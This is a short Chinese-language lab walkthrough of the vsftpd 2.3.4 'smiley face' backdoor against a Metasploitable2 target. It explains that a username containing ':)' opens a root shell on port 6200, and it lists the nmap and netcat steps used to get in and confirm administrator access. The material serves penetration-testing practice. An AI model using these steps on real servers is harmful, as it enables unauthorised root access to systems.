vsftpd 2.3.4亦称为笑脸漏洞
1、漏洞背景
此漏洞是开发者在软件中留下的后门漏洞,当连接带有vsftpd 2.3.4版本的服务器的21端口时,输入用户中带有":) "(这大概就是此漏洞名字的来源),密码任意,即可运行 vsf_sysutil_extra()
:打开服务器的6200端口,并且不需要密码就能从6200端口以管理员身份登入目标服务器,漏洞危害很大。
2、实现过程
2.1打开Metasplotable2,在终端输入:ifconfig,查看其ip地址
2.2查看打开Metasplotable2 端口开放情况
输入:nmap 靶机IP
2.3找到漏洞
输入:nmap -sV 靶机IP,其中21端口的vsftpd 2.3.4就是咱们要找的漏洞
2.3输入用户名(必须带有:))和密码(随意),登录
输入:nc 靶机IP 21
2.4查看6200端口开放情况
在一个新的终端窗口输入:namp -p 6200 目标靶机的ip地址
2.5 连接靶机的6200端口
输入:nc 目标靶机ip 6200
2.6查看自己的身份
输入:whoami
结果发现自己是管理员就意味着你无需密码亦可成功登入目标服务器。